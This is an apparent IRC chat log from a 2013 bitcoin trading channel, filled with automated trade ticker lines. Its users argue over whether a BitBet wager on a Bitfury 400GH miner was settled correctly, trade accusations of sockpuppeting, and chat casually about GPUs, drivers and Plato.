BTC [+] Sep 07 22:11:13 [BTCTC] [ASICMINER-PT] 1 @ 2.239 BTC [+] Sep 07 22:14:01 [BTCTC] [BASIC-MINING] 3 @ 0.105 = 0.315 BTC [-] Sep 07 22:14:02 [BTCTC] [BASIC-MINING] 7 @ 0.09423 = 0.6596 BTC [-] Sep 07 22:17:01 [BTCTC] [ACTIVEMINING] 22 @ 0.003995 = 0.0879 BTC [-] Sep 07 22:17:17 anyone ever used alibaba? Sep 07 22:17:50 [BTCTC] [ACTIVEMINING] 6 @ 0.003996 = 0.024 BTC [+] Sep 07 22:19:34 nope. it's a thing tho, like ebay. Sep 07 22:19:40 perhaps with more scammers on. Sep 07 22:19:50 yeah, just browsing now Sep 07 22:21:39 i think with even low quantity (5-10k units) i can get these HW wallets made insanely cheap Sep 07 22:21:55 like retail for < 0.1 BTC Sep 07 22:22:30 in the immortal words of jeff goldblum in the fly, "i'm more like a supply chain manager" Sep 07 22:23:37 [BTCTC] [BASIC-MINING] 1 @ 0.09432 BTC [+] Sep 07 22:23:51 [BTCTC] [DMS.MINING] 176 @ 0.00241 = 0.4242 BTC [-] Sep 07 22:24:10 if you haven't seen a mutated, melting jeff goldblum whimpering "kill me", you haven't seen jeff goldblum Sep 07 22:25:19 anyway, time for a beach fire Sep 07 22:26:08 "I farm bits and pieces out to the guys who are much more brilliant than I am. I say, "build me a laser", this. "Design me a molecular analyzer", that. They do, and I just stick 'em together. But, none of them know what the project really is. So..." Sep 07 22:31:32 [BTCTC] [LABCOIN] 5 @ 0.003477 = 0.0174 BTC [+] Sep 07 22:31:57 [HAVELOCK] [XBOND] 5 @ 0.001145 = 0.0057 BTC [+] Sep 07 22:33:08 i am very curious about those raw asic chips all over alibaba Sep 07 22:33:38 data is hard to come by in the asic mining space. Sep 07 22:37:34 [BTCTC] [LABCOIN] 28 @ 0.003477 = 0.0974 BTC [+] Sep 07 22:54:16 i finally bought decent gpu.. not to mine but to play eve lmao Sep 07 22:54:25 lol Sep 07 22:56:06 [BTCTC] [DMS.PURCHASE] 79 @ 0.01209 = 0.9551 BTC [-] Sep 07 22:56:22 had only onboard radeon 55xx.. it was playable but reacted slowly, sucked at combat Sep 07 22:56:37 with 7790 it's smooth at high setting Sep 07 22:58:33 did buying nvidia cross your mind? ;) Sep 07 22:59:20 figured it would be easier to upgrade.. and what if i change my mind on mining? xD Sep 07 22:59:58 lol Sep 07 23:00:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02042 = 0.2042 BTC [-] Sep 07 23:00:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.02041 = 0.0816 BTC [-] Sep 07 23:00:05 [BTCTC] [TAT.ASICMINER] 22 @ 0.0204 = 0.4488 BTC [-] Sep 07 23:00:05 i never used anything but nvidia. Sep 07 23:00:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.02026 = 0.0405 BTC [-] Sep 07 23:00:07 [BTCTC] [TAT.ASICMINER] 13 @ 0.02025 = 0.2633 BTC [-] Sep 07 23:00:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0202 BTC [-] Sep 07 23:00:09 [BTCTC] [TAT.ASICMINER] 30 @ 0.02002 = 0.6006 BTC [-] Sep 07 23:00:14 since about 1998 or so Sep 07 23:00:24 [BTCTC] [TAT.ASICMINER] 38 @ 0.02002 = 0.7608 BTC [-] Sep 07 23:00:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.02001 BTC [-] Sep 07 23:00:26 [BTCTC] [TAT.ASICMINER] 100 @ 0.02 = 2 BTC [-] Sep 07 23:00:27 [BTCTC] [TAT.ASICMINER] 100 @ 0.02 = 2 BTC [-] Sep 07 23:00:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02 = 0.08 BTC [-] Sep 07 23:00:44 as it's a sunk cost, it would make sense to mine (unless electricity price is too high of course) Sep 07 23:00:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000642 BTC [+] Sep 07 23:01:40 I left nvidia as soon as I could (decent open source drivers) Sep 07 23:02:06 that reminds me of https://www.fsf.org/photos/rms-sign.jpg Sep 07 23:03:49 [BTCTC] [DMS.MINING] 2 @ 0.00247 = 0.0049 BTC [+] Sep 07 23:04:13 [HAVELOCK] [XBOND] 1 @ 0.001145 BTC [+] Sep 07 23:05:08 [BTCTC] [DMS.MINING] 2 @ 0.00247 = 0.0049 BTC [+] Sep 07 23:05:09 [BTCTC] [DMS.MINING] 1 @ 0.00247 BTC [+] Sep 07 23:05:12 afaik the opensource ati driver is more advanced than nvidia Sep 07 23:05:46 but maybe rms had in mind sometihng else Sep 07 23:05:54 well that's pretty normal. the ati one has paid amd devs behind it and they release specs Sep 07 23:06:13 oh, that rms picture is very old Sep 07 23:06:28 things changed a lot since then Sep 07 23:06:43 nivida does not release code or specs Sep 07 23:07:02 [BTCTC] [DMS.MINING] 497 @ 0.00247 = 1.2276 BTC [+] Sep 07 23:07:43 now it's http://www.geekosystem.com/wp-content/uploads/2012/06/v40g6.gif Sep 07 23:08:19 pankkake i wonder if it was typeset with latex Sep 07 23:08:31 [BTCTC] [DMS.MINING] 13 @ 0.00247 = 0.0321 BTC [+] Sep 07 23:08:52 why? :o Sep 07 23:09:30 just so lol Sep 07 23:13:31 and for our daily plato read, Sep 07 23:13:32 the earth, as being their mother, delivered them, and now, as if their land were their mother and their nurse, they ought to take thought for her and defend her against any attack, and regard the other citizens as their brothers and children of the self-same earth. . . While all of you, in the city, are brothers, we will say in our tale, yet god, in fashioning those of you who are fitted to hold rule, mingled gold in t Sep 07 23:13:32 heir generation, for which reason they are the most precious — but in the helpers, silver, and iron and brass in the farmers and other craftsmen. And, as you are all akin, though for the most part you will breed after your kinds, it may sometimes happen that a golden father would beget a silver son, and that a golden offspring would come from a silver sire, and that the rest would, in like manner, be born of one anot Sep 07 23:13:32 her. So that the first and chief injunction that the god lays upon the rulers is that of nothing else are they to be such careful guardians, and so intently observant as of the intermixture of these metals in the souls of their offspring, and if sons are born to them with an infusion of brass or iron they shall by no means give way to pity in their treatment of them, but shall assign to each the status due to his natur Sep 07 23:13:32 e and thrust them out among the artisans or the farmers. And again, if from these there is born a son with unexpected gold or silver in his composition they shall honor such and bid them go up higher, some to the office of guardian, some to the assistanceship, alleging that there is an oracle that the city shall then be overthrown when the man of iron or brass is its guardian. Sep 07 23:14:39 [BTCTC] [S.BBET-PT] 1 @ 0.0008012 BTC [-] Sep 07 23:16:29 [BTCTC] [DMS.MINING] 53 @ 0.002479 = 0.1314 BTC [+] Sep 07 23:16:31 [BTCTC] [DMS.MINING] 50 @ 0.002479 = 0.124 BTC [+] Sep 07 23:16:51 now only if we had densitometer for characters Sep 07 23:18:04 or densimeter Sep 07 23:20:18 lol "dense character" would be a compliment in plato's eyes then Sep 07 23:22:02 [MPEX] [S.MPOE] 1000 @ 0.00088649 = 0.8865 BTC [+] Sep 07 23:23:22 lol ya. "hey pal, you're fucken dense" Sep 07 23:34:10 [BTCTC] [LABCOIN] 96 @ 0.003478 = 0.3339 BTC [+] Sep 07 23:34:38 [BTCTC] [LABCOIN] 98 @ 0.003477 = 0.3407 BTC [-] Sep 07 23:34:39 [BTCTC] [LABCOIN] 652 @ 0.003479 = 2.2683 BTC [+] Sep 07 23:35:41 [BTCTC] [LABCOIN] 98 @ 0.003479 = 0.3409 BTC [+] Sep 07 23:38:10 [MPEX] [S.MPOE] 2250 @ 0.00088794 = 1.9979 BTC [+] Sep 07 23:41:20 [HAVELOCK] [XBOND] 100 @ 0.001145 = 0.1145 BTC [+] Sep 07 23:47:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.01209 BTC [-] Sep 07 23:48:13 [HAVELOCK] [VTX] 1 @ 0.56 BTC [+] Sep 07 23:49:55 [BTCTC] [DMS.MINING] 5 @ 0.00248 = 0.0124 BTC [+] Sep 07 23:54:08 [HAVELOCK] [XBOND] 1185 @ 0.00114 = 1.3509 BTC [-] Sep 07 23:58:45 [BTCTC] [DMS.PURCHASE] 20 @ 0.01209 = 0.2418 BTC [-] Sep 07 23:59:25 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000642 = 0.0013 BTC [+] Sep 08 00:00:39 [BTCTC] [DMS.MINING] 100 @ 0.00248 = 0.248 BTC [+] Sep 08 00:00:41 [BTCTC] [DMS.MINING] 50 @ 0.00248 = 0.124 BTC [+] Sep 08 00:03:05 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.000642 = 0.0141 BTC [+] Sep 08 00:08:44 [BTCTC] [DMS.MINING] 97 @ 0.002489 = 0.2414 BTC [+] Sep 08 00:17:57 [BTCTC] [DMS.MINING] 358 @ 0.00248 = 0.8878 BTC [-] Sep 08 00:18:08 [BTCTC] [DMS.MINING] 34 @ 0.00248 = 0.0843 BTC [-] Sep 08 00:19:06 [BTCTC] [LABCOIN] 500 @ 0.003479 = 1.7395 BTC [+] Sep 08 00:21:04 [BTCTC] [DMS.MINING] 10 @ 0.00241 = 0.0241 BTC [-] Sep 08 00:23:22 [BTCTC] [DMS.PURCHASE] 3 @ 0.01209 = 0.0363 BTC [-] Sep 08 00:28:13 [BTCTC] [ACTIVEMINING] 10 @ 0.003995 = 0.04 BTC [-] Sep 08 00:28:14 [BTCTC] [ACTIVEMINING] 95 @ 0.003996 = 0.3796 BTC [+] Sep 08 00:29:07 [BTCTC] [ACTIVEMINING] 150 @ 0.003996 = 0.5994 BTC [+] Sep 08 00:35:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.02087 = 0.2087 BTC [+] Sep 08 00:35:46 [MPEX] [S.MPOE] 5500 @ 0.00088649 = 4.8757 BTC [-] Sep 08 00:35:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02087 = 0.2087 BTC [+] Sep 08 00:37:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.02087 = 0.1044 BTC [+] Sep 08 00:41:29 [BTCTC] [LABCOIN] 20 @ 0.003423 = 0.0685 BTC [-] Sep 08 00:41:30 [BTCTC] [LABCOIN] 5 @ 0.003422 = 0.0171 BTC [-] Sep 08 00:41:30 [BTCTC] [LABCOIN] 907 @ 0.00341 = 3.0929 BTC [-] Sep 08 00:48:57 [BTCTC] [BTC-BOND] 14 @ 0.01 = 0.14 BTC [+] Sep 08 00:49:48 [BTCTC] [S.MPOE-PT] 3 @ 0.0007851 = 0.0024 BTC [-] Sep 08 00:51:49 [BTCTC] [ACTIVEMINING] 1 @ 0.003996 BTC [+] Sep 08 00:51:51 [BTCTC] [ACTIVEMINING] 22 @ 0.003996 = 0.0879 BTC [+] Sep 08 00:54:16 [BTCTC] [ACTIVEMINING] 477 @ 0.003996 = 1.9061 BTC [+] Sep 08 00:54:30 [BTCTC] [LABCOIN] 208 @ 0.003411 = 0.7095 BTC [+] Sep 08 00:54:32 [BTCTC] [LABCOIN] 96 @ 0.00341 = 0.3274 BTC [-] Sep 08 00:55:31 [BTCTC] [DMS.PURCHASE] 30 @ 0.01209 = 0.3627 BTC [-] Sep 08 00:59:05 [BTCTC] [DMS.MINING] 222 @ 0.002499 = 0.5548 BTC [+] Sep 08 00:59:06 [BTCTC] [DMS.MINING] 140 @ 0.0025 = 0.35 BTC [+] Sep 08 01:01:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.02085 = 0.5213 BTC [-] Sep 08 01:01:24 [BTCTC] [TAT.ASICMINER] 103 @ 0.02086 = 2.1486 BTC [+] Sep 08 01:04:30 [MPEX] [S.MPOE] 3800 @ 0.00088649 = 3.3687 BTC [-] Sep 08 01:06:09 is it me or has bitcointalk pretty much degenerated into five scammers talking to each other through > 100 sockpuppets ? Sep 08 01:07:59 [BTCTC] [PETA-MINE] 2 @ 0.6598 = 1.3196 BTC [-] Sep 08 01:08:27 which 5 are those? Sep 08 01:08:42 [BTCTC] [PETA-MINE] 6 @ 0.6599 = 3.9594 BTC [+] Sep 08 01:09:30 well that's an arbitrary determination, you can name them alpha, bravo, cunt, delta and echo Sep 08 01:10:08 [BTCTC] [BTC-TRADING-PT] 1 @ 1.118 BTC [-] Sep 08 01:10:24 hehe Sep 08 01:10:46 *wonders who cunt is.. haven't seen charlie for a while :p Sep 08 01:11:28 :p Sep 08 01:13:33 [BTCTC] [BASIC-MINING] 1 @ 0.1195 BTC [+] Sep 08 01:13:49 [HAVELOCK] [XBOND] 1600 @ 0.001091 = 1.7456 BTC [-] Sep 08 01:13:53 [HAVELOCK] [XBOND] 350 @ 0.00109 = 0.3815 BTC [-] Sep 08 01:13:57 [HAVELOCK] [XBOND] 500 @ 0.00108 = 0.54 BTC [-] Sep 08 01:14:02 [HAVELOCK] [XBOND] 50 @ 0.00107 = 0.0535 BTC [-] Sep 08 01:14:54 what do u make of these 200TH ups and downs the last few days Sep 08 01:14:56 http://bitcoin.sipa.be/speed-small-lin-2k.png Sep 08 01:15:09 [BTCTC] [DMS.MINING] 47 @ 0.00253 = 0.1189 BTC [+] Sep 08 01:15:10 [BTCTC] [DMS.MINING] 100 @ 0.002579 = 0.2579 BTC [+] Sep 08 01:15:12 [BTCTC] [DMS.MINING] 100 @ 0.0026 = 0.26 BTC [+] Sep 08 01:15:13 [BTCTC] [DMS.MINING] 150 @ 0.002753 = 0.413 BTC [+] Sep 08 01:15:14 [BTCTC] [DMS.MINING] 160 @ 0.002754 = 0.4406 BTC [+] Sep 08 01:15:16 [BTCTC] [DMS.MINING] 79 @ 0.0028 = 0.2212 BTC [+] Sep 08 01:15:17 [BTCTC] [DMS.MINING] 25 @ 0.0028 = 0.07 BTC [+] Sep 08 01:15:18 [BTCTC] [DMS.MINING] 41 @ 0.0028 = 0.1148 BTC [+] Sep 08 01:15:19 [BTCTC] [DMS.MINING] 100 @ 0.00295 = 0.295 BTC [+] Sep 08 01:15:21 [BTCTC] [DMS.MINING] 510 @ 0.002985 = 1.5224 BTC [+] Sep 08 01:15:34 [BTCTC] [DMS.MINING] 16 @ 0.002999 = 0.048 BTC [+] Sep 08 01:15:37 [BTCTC] [DMS.MINING] 10 @ 0.003 = 0.03 BTC [+] Sep 08 01:15:38 [BTCTC] [DMS.MINING] 10 @ 0.003 = 0.03 BTC [+] Sep 08 01:15:39 [BTCTC] [DMS.MINING] 200 @ 0.003 = 0.6 BTC [+] Sep 08 01:15:41 [BTCTC] [DMS.MINING] 73 @ 0.00306 = 0.2234 BTC [+] Sep 08 01:15:42 [BTCTC] [DMS.MINING] 48 @ 0.0031 = 0.1488 BTC [+] Sep 08 01:15:43 [BTCTC] [DMS.MINING] 100 @ 0.0031 = 0.31 BTC [+] Sep 08 01:15:43 [BTCTC] [DMS.MINING] 11 @ 0.0031 = 0.0341 BTC [+] Sep 08 01:15:44 [BTCTC] [DMS.MINING] 1000 @ 0.00315 = 3.15 BTC [+] Sep 08 01:15:45 [BTCTC] [DMS.MINING] 393 @ 0.00319 = 1.2537 BTC [+] Sep 08 01:15:46 [BTCTC] [DMS.MINING] 30 @ 0.0032 = 0.096 BTC [+] Sep 08 01:15:47 [BTCTC] [DMS.MINING] 100 @ 0.0032 = 0.32 BTC [+] Sep 08 01:15:48 [BTCTC] [DMS.MINING] 100 @ 0.0032 = 0.32 BTC [+] Sep 08 01:17:02 after reading this thread, i think i can safely say I won't be using BitBet again Sep 08 01:17:04 https://bitcointalk.org/index.php?topic=289316.0 Sep 08 01:17:09 BitBet incorrectly declares yes to a no bet. Stay Away from BitBet! Sep 08 01:17:23 wow. can't belive they totally scammed the no betters on that one... it clearly should have been a no Sep 08 01:18:31 also, is it true that Anduck bribed bitbet for them to vote yes? Sep 08 01:18:35 you're bad Sep 08 01:18:38 what? Sep 08 01:18:39 lol Sep 08 01:18:39 so bad Sep 08 01:18:44 wogwog: yes Sep 08 01:18:46 ahaha Sep 08 01:18:58 0/10 Sep 08 01:19:14 [BTCTC] [BTC-TRADING-PT] 2 @ 1.015 = 2.03 BTC [-] Sep 08 01:19:17 what the duck is problem with these guys? it was about delivering and they delivered!! and they delivered the advertised hashrate at advertised performance. end of Sep 08 01:19:18 here's a tip you wannabe you : next time you want to sock, use a different https://www.projecthoneypot.org/ip_79.129.41.134 Sep 08 01:19:19 not even able to change his ip Sep 08 01:19:27 honeypotted ip than the one you normally log from. Sep 08 01:19:41 Anduck basically it's some btc noob trying his "i can do anything" muscles. Sep 08 01:20:01 my nick in the thread is 'Luke-Jr' Sep 08 01:20:26 Sep 07 02:12:05 Nick 'fractal', with hostmask 'fractal!4f812986@gateway/web/freenode/ip.79.129.41.134', is not identified. Sep 08 01:20:28 i'll personally keep posting to that thread... i suggest you guys keep posting too, the more it gets bumped to the top of the gambling forum the better, more exposure so that innocent betters will be saved Sep 08 01:20:40 mp: can't belive you spent time looking up my ip. it was obvious from the first 3 messages Sep 08 01:20:43 lol Sep 08 01:20:46 herp. Sep 08 01:20:50 derp. Sep 08 01:20:55 why dont you use the nick "fractal" we all know Sep 08 01:21:14 Anduck because he's a junior in psychology and that's what the book of reversal says Sep 08 01:21:22 fine... Sep 08 01:21:26 look up IP? it says right there when you join.. Sep 08 01:21:34 [22:16:24] --> wogwog has joined this channel (4f812986@gateway/web/freenode/ip.79.129.41.134). Sep 08 01:21:37 Anduck: because i use a different nick every time i log in here. also, i have respected identities in the bitcoin community. and dont need to ruin them with trollfests and conspiracy theories Sep 08 01:21:56 wogwog: any respected client (i.e. no web irc crap) shows hostmasks of people who join Sep 08 01:21:56 so you admit this is a trollfest and conspiracy theory. Sep 08 01:22:19 Luke-Jr: the trollfest is not me. its the yes betters and yourself Sep 08 01:22:30 Luke-Jr he doesn't know that cause webirc doesn't show em iirc Sep 08 01:22:32 *opens the popcorn* Sep 08 01:22:35 Luke-Jr: you've clearly been trolling me since its totally illogical for you to think that 2 units == 1 unit Sep 08 01:23:32 only a troll would try to convince people that 2 units == 1 unit Sep 08 01:23:53 wogwog: nobody ever said 1 unit = 1 m-board with 16 hboards!!! Sep 08 01:23:56 no no no no no Sep 08 01:24:02 Anduck: punin did. Sep 08 01:24:10 well uhh did not Sep 08 01:24:13 yes he did Sep 08 01:24:20 check the forum post Sep 08 01:24:22 actually it is irrelevant Sep 08 01:24:26 he called the 400Gh unit a unit Sep 08 01:24:31 [HAVELOCK] [XBOND] 10 @ 0.00107 = 0.0107 BTC [-] Sep 08 01:24:32 said it underperforms Sep 08 01:24:38 and he'd have to ship out more hardware Sep 08 01:24:42 dude you tried to get easy money by betting on a result you "knew" and were 100% sure. and you failed.. and now you whine, right? Sep 08 01:24:56 *enjoys the deja ecrit* Sep 08 01:25:11 no. i'm spreading the truth. that the bet was fraudlenty passed as yes Sep 08 01:25:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.0206 = 1.03 BTC [-] Sep 08 01:25:28 it did not meet performance stats Sep 08 01:25:41 Anduck: he must be trying to set a record for most epic fail Sep 08 01:25:45 but what is relevant, about this discussion: http://awesomegifs.com/wp-content/uploads/no.gif Sep 08 01:26:32 Luke-Jr: the only epic fail is that you can't read. you think 2 units == 1 unit Sep 08 01:27:10 wogwog you srsly don't need to worry, nobody respects noagendamarket/etc either. Sep 08 01:27:15 [BTCTC] [ASICMINER-PT] 1 @ 2.188 BTC [-] Sep 08 01:27:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.0206 = 0.1854 BTC [-] Sep 08 01:27:51 [BTCTC] [TAT.ASICMINER] 300 @ 0.0206 = 6.18 BTC [-] Sep 08 01:27:52 [MPEX] [S.MPOE] 6345 @ 0.00088737 = 5.6304 BTC [+] Sep 08 01:27:54 [MPEX] [S.MPOE] 3800 @ 0.00088794 = 3.3742 BTC [+] Sep 08 01:28:01 [BTCTC] [RSM] 3 @ 0.008201 = 0.0246 BTC [-] Sep 08 01:28:04 [MPEX] [S.MPOE] 4050 @ 0.000888 = 3.5964 BTC [+] Sep 08 01:28:05 [MPEX] [S.MPOE] 699 @ 0.00088829 = 0.6209 BTC [+] Sep 08 01:28:18 [HAVELOCK] [XBOND] 260 @ 0.00109999 = 0.286 BTC [+] Sep 08 01:28:28 wogwog: unit can be a group of units Sep 08 01:28:41 wogwog: you need to read the whole thread you started. it's got pretty valid points there Sep 08 01:28:41 pankkake: you're pretty bad at not feeding the troll Sep 08 01:28:50 if punin really limited the unit to 1 m-board with 16 hboards, he'd ship it that way Sep 08 01:28:56 pankkake: you think that thread is a troll, but you keep posting Sep 08 01:28:57 [HAVELOCK] [XBOND] 2630 @ 0.0011 = 2.893 BTC [+] Sep 08 01:29:01 lol Sep 08 01:29:03 but he did not Sep 08 01:29:14 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [+] Sep 08 01:29:27 truth is you know its not a troll. its logic. Sep 08 01:29:28 yeah my posting call for ignoring your antics Sep 08 01:29:36 jurov: the 400Gh unit does not exist. Sep 08 01:30:21 neither does your 1 m-board with 16 hboards Sep 08 01:30:25 you can't order it Sep 08 01:30:38 jurov: yes you can order it Sep 08 01:30:48 pankkake: too bad you were outed as a paid shrill/troll Sep 08 01:30:50 jurov: http://www.bitfurystrikesback.com/product/400gh-miner-october-2013/ Sep 08 01:30:51 wogwog: but seriously. you lost the bet, deal with it. think about it like you tried to get advantage of the wording of the bet and failed. http://www.wallchan.com/images/mediums/30784.jpg Sep 08 01:30:55 [BTCTC] [BASIC-MINING] 2 @ 0.1193 = 0.2386 BTC [-] Sep 08 01:31:13 wogwog: there is nothing to "out" as it's public Sep 08 01:31:57 wogwog: so do order it and then demostrate the hw you got does not match advertised performance Sep 08 01:31:58 pankkake anyone actually paid you yet ? Sep 08 01:32:18 [BTCTC] [BASIC-MINING] 2 @ 0.1193 = 0.2386 BTC [-] Sep 08 01:33:10 Anduck. I didn't bet. I'm just defending the NO side. Sep 08 01:33:15 mircea_popescu: no :( Sep 08 01:33:28 You've just assumed that I bet. Sep 08 01:33:28 but I don't get anything I can actually fullfil Sep 08 01:33:33 you suck! Sep 08 01:33:50 yesterday i asked about how much you invested and you mentioned that it's negatable, thus i believe your goal is not to be reimbursed, so i ask: what is your goal? being annoying as much as you can? Sep 08 01:33:56 my dream of getting paid to insult people isn't working Sep 08 01:34:04 all the other trolls out there are making five figures out of dorking it out on the webs all day Sep 08 01:34:07 /sarcasm Sep 08 01:34:37 paid shills on the internet are a fact though. the European Union got caught doing it Sep 08 01:34:57 pankkake supposedly making money spamming is also a fact. tenouous as it may sound. Sep 08 01:35:08 nevertheless most spammers do it for something between free and nothing at all. Sep 08 01:35:14 paid papers published too - I knew a guy who did that. what he wrote wasn't *wrong* though, nor lies Sep 08 01:35:25 [BTCTC] [BASIC-MINING] 1 @ 0.1193 BTC [-] Sep 08 01:35:31 dexX7: my goal is that people acknowledge that the bet was incorrectly labelled yes. the 400Gh unit only does 365Gh. it did not meet advertised performance. the bet is a no. Sep 08 01:35:31 [MPEX] [S.MPOE] 3700 @ 0.00088649 = 3.28 BTC [-] Sep 08 01:35:32 [MPEX] [S.MPOE] 9616 @ 0.00088589 = 8.5187 BTC [-] Sep 08 01:35:36 I wouldn't do something I would consider unethical (like spamming, lying) Sep 08 01:35:43 [MPEX] [S.MPOE] 3300 @ 0.00088585 = 2.9233 BTC [-] Sep 08 01:35:46 [MPEX] [S.MPOE] 284 @ 0.00088452 = 0.2512 BTC [-] Sep 08 01:35:54 just sayin', the things that anyone can do aren't usually paid. Sep 08 01:36:00 by the way, i'm not integrty42. tho i'm glad someone made a forum post regarding this........ Sep 08 01:36:04 but you do realize that coming here with different nicks and starting hate threads on btctalk is probably not the best way to achive this goal? Sep 08 01:36:08 sure Sep 08 01:36:27 [BTCTC] [BASIC-MINING] 2 @ 0.1194 = 0.2388 BTC [+] Sep 08 01:36:29 it's a question of time, that's what I tried to advertise in my offer: some guy is dumb on the internet and you're busy? here I am! Sep 08 01:36:48 and there's chances I will not rage while he will Sep 08 01:37:00 pankkake but he's too raged out to realise this. Sep 08 01:37:01 dexX7: this is all noise -- as long as the facts are laid out -- the unit did not perform as advertised -- thats what matters Sep 08 01:37:13 why do you think people "invest" their own bitdust, and do their own plumbing ? Sep 08 01:37:18 pankkake is more enraged then i am. Sep 08 01:37:28 pankkake loves me and the thread. i am his reason for living. Sep 08 01:37:34 [HAVELOCK] [XBOND] 90 @ 0.0011 = 0.099 BTC [+] Sep 08 01:37:54 investing bitdust is fun - to a point, now it's wasting my time Sep 08 01:38:17 wogwog_: I have like 10 average continuous trollings in my life Sep 08 01:38:26 pankkake: the second you replied to a thing i said, you wasted your time.... you'll never get it back Sep 08 01:38:54 I'm guilty of doing my own plumbing, too, I'm a thinkerer Sep 08 01:39:32 pankkake: lets talk about that for a minute. think of the time you wasted because of me.... just think about it. you could have spent it reading a book, bettering yourself... enjoying the outdoors, getting laid...... yet. you spent it on me. Sep 08 01:39:33 kinda how it goes. people start a game of mudbitcoin, it's fun cause it's so wtf. that last a while, then it wears off, then they lose interest. Sep 08 01:39:46 thats a pretty powerful connection we have, the two of us Sep 08 01:39:46 wogwog_: but in the thread you said you bet no and lost???? Sep 08 01:39:52 [BTCTC] [BASIC-MINING] 1 @ 0.1196 BTC [+] Sep 08 01:40:07 wogwog_: since after all, you _are_ fractal and the starter of the thread Sep 08 01:40:07 wogwog_: my activity is high right now because I have free time to do only dumb things, sadly Sep 08 01:40:15 wogwog_: i'm not integrtiy42... i told you. Sep 08 01:40:15 I'd rather write code but can't Sep 08 01:40:24 wogwog_: but you are? Sep 08 01:40:30 Anduck: nope Sep 08 01:40:33 but you are? Sep 08 01:40:40 nope Sep 08 01:40:44 ...but you are Sep 08 01:40:50 nope Sep 08 01:40:50 dude you ARE Sep 08 01:40:52 nope Sep 08 01:40:55 you talk like him and you have same statements Sep 08 01:40:59 dooont lie Sep 08 01:41:01 nope Sep 08 01:41:05 but fractal is integrity42 Sep 08 01:41:09 and you're fractal Sep 08 01:41:15 logic! Sep 08 01:41:18 nope Sep 08 01:41:18 defeat! Sep 08 01:41:52 lol Sep 08 01:42:01 Anduck: if someone uses the same statements as me, they must have been reading this chat, and think that i have good points to make. Sep 08 01:42:15 not surprising, Sep 08 01:42:15 wogwog_: more: the bet stated "Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W)" and not "25 GH/s PER unit 40W" => unit is not used as measuring unit, but as label (e.g. "the product "25 gh/s miner" has to perform at > 25 gh/s & < 1 w / gh/s") Sep 08 01:42:39 we should make a bet on fractal's bet site as to whether bitcoin.oz using the same ip as wogwog and fractal makes it the same unit or not. Sep 08 01:42:52 dexX7: the 25GH unit performed as advertised, since they could add another H-card... but that isnt possible with the 400Gh unit Sep 08 01:42:57 dexX7: the 25Gh unit passed! Sep 08 01:43:04 if the bet was 25Gh unit, it was a yes Sep 08 01:43:13 it's not about the cards Sep 08 01:43:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0209 BTC [+] Sep 08 01:43:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.02095 = 0.0419 BTC [+] Sep 08 01:43:28 dexX7: its about the definition of the term 'unit' Sep 08 01:43:46 correct Sep 08 01:44:07 wogwog_: so you want to change the bet "bitfury will ship on time and deliver the performance they said" to "no" because of wording or definition of "unit" ? Sep 08 01:44:09 duuuude Sep 08 01:44:18 [BTCTC] [ACTIVEMINING] 15 @ 0.00406 = 0.0609 BTC [+] Sep 08 01:44:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.02095 BTC [+] Sep 08 01:45:02 the best that could have happened is a cancellation Sep 08 01:45:08 [BTCTC] [BASIC-MINING] 9 @ 0.1196 = 1.0764 BTC [+] Sep 08 01:45:09 wogwog_: "400 GH/s unit 400W" what does that mean in a simple sentence? Sep 08 01:45:10 [BTCTC] [BASIC-MINING] 1 @ 0.1193 BTC [-] Sep 08 01:45:20 [BTCTC] [LABCOIN] 3 @ 0.003474 = 0.0104 BTC [+] Sep 08 01:45:26 dexX7: it means the unit must be over 400Gh and under 400W Sep 08 01:45:30 [MPEX] [O.USD.C101N] 5 @ 0.64848614 = 3.2424 BTC [+] Sep 08 01:45:32 it wasn't over 400Gh. it was 365Gh Sep 08 01:45:33 [BTCTC] [ACTIVEMINING] 4 @ 0.00406 = 0.0162 BTC [+] Sep 08 01:45:43 [MPEX] [O.USD.P101N] 5 @ 0.53553951 = 2.6777 BTC [-] Sep 08 01:46:11 theres a picture of the unit on the thread. go look with your eyes. thats what a unit is Sep 08 01:46:24 [BTCTC] [DMS.PURCHASE] 5 @ 0.01209 = 0.0605 BTC [-] Sep 08 01:47:03 which unit? Sep 08 01:47:25 [BTCTC] [LABCOIN] 9 @ 0.003474 = 0.0313 BTC [+] Sep 08 01:47:39 could it be that "400 gh/s unit" is the product? Sep 08 01:47:40 pankkake: there was no reason for cancellation.. that or "no" would've been just wrong. Sep 08 01:47:43 this unit https://bitcointalk.org/index.php?topic=250249.msg3050985#msg3050985 Sep 08 01:48:00 says you. Sep 08 01:48:03 aha Sep 08 01:48:06 Anduck: no. says punin. Sep 08 01:48:09 Anduck: the reason "fractal would shut up" would be enough IMHO :p Sep 08 01:48:31 Anduck: out of punins mouth "We can't deliver 400Gh in 1 unit" -- paraphrase Sep 08 01:48:38 his quote is on the thread Sep 08 01:48:39 I'm saying the *best* in the sense of fractal, not mine - I think it's a No Sep 08 01:48:50 I mean Yes Sep 08 01:48:51 fuck Sep 08 01:48:52 lol Sep 08 01:49:12 hmmm Sep 08 01:49:34 guys, punin himself admitted the '400Gh unit' doesn't do 400Gh... i dont know what else to say.... Sep 08 01:49:53 but really betting at a bitbet because of "knowing the outcome" and in the thoughts of "easy 100% sure money".... lol Sep 08 01:50:09 well that often doesn't pan out. Sep 08 01:50:22 it's more likely for the subject to have misunderstood something than for the entire world to have. Sep 08 01:51:23 Anduck: I didn't know the outcome. punin could have fixed the 400Gh unit and shipped it by sept 1. Sep 08 01:51:29 and I would have lost Sep 08 01:52:07 [MPEX] [S.MPOE] 6600 